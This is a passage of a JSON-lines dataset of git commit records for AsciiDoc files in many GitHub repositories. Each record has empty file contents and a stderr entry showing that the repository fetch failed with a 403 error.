ch,strapdata\/elassandra-test,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,xingguang2013\/elasticsearch,lydonchandra\/elasticsearch,martinstuga\/elasticsearch,huanzhong\/elasticsearch,himanshuag\/elasticsearch,PhaedrusTheGreek\/elasticsearch,karthikjaps\/elasticsearch,infusionsoft\/elasticsearch,Shekharrajak\/elasticsearch,Stacey-Gammon\/elasticsearch,onegambler\/elasticsearch,AndreKR\/elasticsearch,drewr\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,bestwpw\/elasticsearch,mnylen\/elasticsearch,mm0\/elasticsearch,jeteve\/elasticsearch,yynil\/elasticsearch,himanshuag\/elasticsearch,kenshin233\/elasticsearch,spiegela\/elasticsearch,camilojd\/elasticsearch,linglaiyao1314\/elasticsearch","old_file":"docs\/reference\/mapping\/fields.asciidoc","new_file":"docs\/reference\/mapping\/fields.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a98805f85eef22d351088765921cbc02676a307","subject":"Fixing repository-hdfs link (#878)","message":"Fixing repository-hdfs link (#878)\n\nFixing the repository-hdfs link as its now in ES proper","repos":"xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"591930aeb26628c221a8e791f2b115956de92501","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57644b90723d86f4cc286caa5a673267c78beeb8","subject":"Update 2017-08-04-mecab.adoc","message":"Update 
2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ba8882738511ff98f87a8c60f9adf106e24738c","subject":"Added Rafael and Ron as new members","message":"Added Rafael and Ron as new members\n","repos":"struberg\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,danielsoro\/deltaspike,os890\/deltaspike-vote,rdicroce\/deltaspike,apache\/deltaspike,idontgotit\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,Danny02\/deltaspike,struberg\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,os890\/DS_Discuss,Danny02\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,mlachat\/deltaspike,chkal\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,subaochen\/deltaspike,struberg\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,os890\/DS_Discuss,mlachat\/deltaspike,apache\/deltaspike,apache\/deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,danielsoro\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike","old_file":"site\/src\/main\/asciidoc\/news.adoc","new_file":"site\/src\/main\/asciidoc\/news.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c84f2375adcaf817854e07724d2109340c01b08","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d99ea34953e76ec2f23e79bc80b3362c1e7ad6b","subject":"Ex init","message":"Ex init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Rest client Ex.adoc","new_file":"Rest client Ex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b5dae337acd0b403b58b979165658b1a6da79b0","subject":"contacts api code samples","message":"contacts api code samples\n","repos":"CallFire\/callfire-api-1.1-client-java","old_file":"docs\/api\/contacts\/ContactsApi.adoc","new_file":"docs\/api\/contacts\/ContactsApi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CallFire\/callfire-api-1.1-client-java.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"90b3a18d3ff770a5ba18ad8764b53a39fb30f46b","subject":"Update 2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","message":"Update 2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","new_file":"_posts\/2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32103d4f7463797c24087305866a5b4af609660e","subject":"y2b create post Unboxing The New $5000 MacBook Pro","message":"y2b create post Unboxing The New $5000 MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-04-Unboxing-The-New-5000-MacBook-Pro.adoc","new_file":"_posts\/2016-12-04-Unboxing-The-New-5000-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2238c948d84409585216dea948eef8bd3e9670a9","subject":"Introduce int","message":"Introduce int\n","repos":"lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12310_cli_prebuild_handle_parse_errors\/12310_cli_prebuild_handle_parse_errors.int.adoc","new_file":"doc-bridgepoint\/notes\/12310_cli_prebuild_handle_parse_errors\/12310_cli_prebuild_handle_parse_errors.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f25b1194717f4889610921e22ba9eb281671a4d","subject":"y2b create post Xzibit Shows Off Monster's T1 Gaming Headset \\\/ Headphones","message":"y2b create post Xzibit Shows Off Monster's T1 Gaming Headset \\\/ 
Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-11-Xzibit-Shows-Off-Monsters-T1-Gaming-Headset--Headphones.adoc","new_file":"_posts\/2012-01-11-Xzibit-Shows-Off-Monsters-T1-Gaming-Headset--Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef9b655f83de153075f6566721d5417368785bc","subject":"Deleted 2016-6-26-first-title.adoc","message":"Deleted 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c927a6d740a8f359005533e906bb481d4090e5","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd529c1c3cc6ffa7135090154574dd7636de44a4","subject":"Update 2013-04-26-The-bus.adoc","message":"Update 2013-04-26-The-bus.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-26-The-bus.adoc","new_file":"_posts\/2013-04-26-The-bus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f619a75ea412dc509b4fd861b161b61395ff88ee","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e7ed5917855e51897e669229fadc9d8a6f8efdf","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 
2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6016c59a288ce4c8a359602cdd82ad28a80c25a3","subject":"Add bullet points to Not Supported list","message":"Add bullet points to Not Supported list\n\nMinor formatting, but it threw me for a loop when I read it","repos":"tobiasge\/OutlookPrivacyPlugin,tobiasge\/OutlookPrivacyPlugin,dejavusecurity\/OutlookPrivacyPlugin,korusdipl\/OutlookPrivacyPlugin,dejavusecurity\/OutlookPrivacyPlugin,GPGatHGB\/OutlookPrivacyPlugin,Baebeca\/OutlookPrivacyPlugin,korusdipl\/OutlookPrivacyPlugin,GPGatHGB\/OutlookPrivacyPlugin,Baebeca\/OutlookPrivacyPlugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korusdipl\/OutlookPrivacyPlugin.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4fa56ced298a85550fa094091e6ca1a93643eb37","subject":"Add README","message":"Add README\n","repos":"BrianOn99\/molamola-ftp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrianOn99\/molamola-ftp.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b9934b184c0ac197b8e2d109199bef791fc2953f","subject":"README","message":"README\n","repos":"motemen\/go-quickfix","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/motemen\/go-quickfix.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"548caf5b4618c0be7a80ef1f2de042cb154a6053","subject":"Update 2016-06-30-Feedback-Email.adoc","message":"Update 2016-06-30-Feedback-Email.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-30-Feedback-Email.adoc","new_file":"_posts\/2016-06-30-Feedback-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51cf87ce9484c387b76297b48ecd747e69f62c90","subject":"Update 2017-06-23-mutual-respect.adoc","message":"Update 2017-06-23-mutual-respect.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-23-mutual-respect.adoc","new_file":"_posts\/2017-06-23-mutual-respect.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"969fc1ba0d3cb2477c25aa074d61ed41a349163b","subject":"y2b create post Nintendo 3DS Review","message":"y2b create post Nintendo 3DS 
Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-05-Nintendo-3DS-Review.adoc","new_file":"_posts\/2011-04-05-Nintendo-3DS-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e142812ed667e543120394b6265548efc824ae91","subject":"Update 2016-02-05-A-few-introductions.adoc","message":"Update 2016-02-05-A-few-introductions.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-05-A-few-introductions.adoc","new_file":"_posts\/2016-02-05-A-few-introductions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556b1bc5d06d4fd767261eaa2bea8f2df1b55a8c","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3feb0979a9bdeab8b0fa906c23c0ad10b50bf85a","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c32aff6b2e7a939177ebfcbd903c251f6b6ba3cf","subject":"add placeholder for post about :target :bundle","message":"add placeholder for post about :target :bundle\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2020-04-13-bundle-target.adoc","new_file":"content\/news\/2020-04-13-bundle-target.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ac9275dc4ed905cb4705d7a8ae14c9e7f7bbc0dc","subject":"Update 2015-08-01-Neue-Partner.adoc","message":"Update 2015-08-01-Neue-Partner.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-08-01-Neue-Partner.adoc","new_file":"_posts\/2015-08-01-Neue-Partner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"b02420569e312f526973b54a7b12a0edd0079f1f","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"184c15de9d8a3b25917d2045a49bd48056a49ce2","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb10736d90feef4c2304b606fbfb33f16ad63f7","subject":"Update 2017-05-11-picture-book.adoc","message":"Update 2017-05-11-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-11-picture-book.adoc","new_file":"_posts\/2017-05-11-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77cce3e3dbe8f2339e665cade38968cacbcf88b","subject":"added CONTRIBUTING for CLA reference on pull request and issue submission.","message":"added CONTRIBUTING for CLA reference on pull request and issue 
submission.\n","repos":"newkek\/incubator-tinkerpop,apache\/incubator-tinkerpop,artem-aliev\/tinkerpop,RedSeal-co\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,gdelafosse\/incubator-tinkerpop,jorgebay\/tinkerpop,krlohnes\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,krlohnes\/tinkerpop,Lab41\/tinkerpop3,pluradj\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,artem-aliev\/tinkerpop,RedSeal-co\/incubator-tinkerpop,jorgebay\/tinkerpop,edgarRd\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,apache\/tinkerpop,newkek\/incubator-tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,dalaro\/incubator-tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,PommeVerte\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,gdelafosse\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,mpollmeier\/tinkerpop3,krlohnes\/tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,vtslab\/incubator-tinkerpop,newkek\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,mpollmeier\/tinkerpop3,velo\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,robertdale\/tinkerpop,Lab41\/tinkerpop3,edgarRd\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,rmagen\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop,velo\/incubator-tinkerpop","old_file":"CONTRIBUTING.asciidoc","new_file":"CONTRIBUTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jorgebay\/tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d64ad3bfa79498a96f57c1fb7a3eec18ed45a96","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/life_as_a_dance.adoc","new_file":"content\/writings\/life_as_a_dance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a0ac2a869a74abd39bfbdddeb7648849045f85f1","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"88fac280223eba766ae4be5a3560a954ce2f40f0","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38f83602123231af1767dbb34d77e6dc7f168126","subject":"Create common-grailsApplicationForge-grails3.adoc","message":"Create common-grailsApplicationForge-grails3.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-grailsApplicationForge-grails3.adoc","new_file":"src\/main\/docs\/common-grailsApplicationForge-grails3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f42c7e8939be9734dd9a4d9f518c6f9dc132d593","subject":"Update 2016-03-29-Glosario.adoc","message":"Update 2016-03-29-Glosario.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Glosario.adoc","new_file":"_posts\/2016-03-29-Glosario.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72213d28004ada97b4d978bc1140da704cab7621","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23ecd632e8e88fc7293a76d6b4aa8cdde55ae9df","subject":"Debezium 1.2.0.Alpha1 release announcement","message":"Debezium 1.2.0.Alpha1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-04-16-debezium-1-2-alpha1-released.adoc","new_file":"blog\/2020-04-16-debezium-1-2-alpha1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38f9e11933ce2d2e6a6ebc6c0085bc6db45c7cfb","subject":"Update index.asciidoc","message":"Update index.asciidoc","repos":"SMB-TEC\/extended-objects,buschmais\/extended-objects","old_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
